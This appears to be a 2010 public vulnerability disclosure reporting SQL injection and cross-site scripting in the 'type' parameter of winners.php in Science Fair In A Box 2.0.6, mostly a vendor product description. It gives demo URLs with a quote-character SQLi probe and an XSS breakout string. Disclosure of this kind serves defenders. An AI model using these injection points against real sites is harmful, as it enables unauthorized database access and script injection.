65 lines
No EOL
3.4 KiB
Text
65 lines
No EOL
3.4 KiB
Text
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
|
|
Exploit Title: Science Fair In A Box SQLi & XSS Vulnerability
|
|
Version:2.0.6
|
|
Price:Free
|
|
Vendor url:http://www.sfiab.ca/
|
|
Published: 2010-06-09
|
|
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all
|
|
ICW members
|
|
###############################################################################################################################################################################################
|
|
|
|
|
|
Science Fair In A Box SQLi & XSS Vulnerability
|
|
|
|
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
|
|
|
|
#####################################################################################################################################################################################################
|
|
|
|
Description:
|
|
|
|
The "Science Fair in a Box" (SFIAB) project provides regions hosting a
|
|
science fair with a complete and comprehensive package that can be used to
|
|
assist in the implementation and running of the fair.
|
|
The SFIAB provides a web based application to facilitate all areas of
|
|
running a science fair such as online registration for the participants,
|
|
judges, sponsor management, judge scheduling and awards management.
|
|
The SFIAB is implemented using open-source tools wherever possible, creating
|
|
a truly open and customizable product that fairs can modify to suit their
|
|
needs.
|
|
However, SFIAB contain enough configuration options to allow fairs to use
|
|
the system without any modifications to the underlying codebase. SFIAB is
|
|
developed using PHP, with MySQL as the backend database.
|
|
Other database backends could be supported in the future. All reports are
|
|
created in print-ready PDF format to ensure cross-platform compatibility
|
|
where applicable and also available to export as a CSV to external
|
|
applications.
|
|
All text in SFIAB is internationalized to allow the use of the system in any
|
|
language. 'Language Packs' will be available in other language once
|
|
translations are complete. (If you'd like to assist in translation, contact
|
|
us!)
|
|
SFIAB is the most advanced, most comprehensive Science Fair Software in the
|
|
world, and is used by many science fairs spread across many different
|
|
countries!
|
|
#######################################################################################################################################################################################################
|
|
|
|
Vulnerability:
|
|
|
|
*SQLi Vulnerability
|
|
|
|
DEMO URL :http://server/sfiab/winners.php?year=2008&type=Special'
|
|
|
|
*XSS Vulnerability
|
|
|
|
Parameter:'"-->
|
|
|
|
DEMO URL :http://server/sfiab/winners.php?year=2008&type=Special [xss]
|
|
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
|
# 0day n0 m0re #
|
|
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
|
|
|
|
|
##########################################################################################################################################################################################
|
|
|
|
--
|
|
With R3gards,
|
|
L0rd CrusAd3r |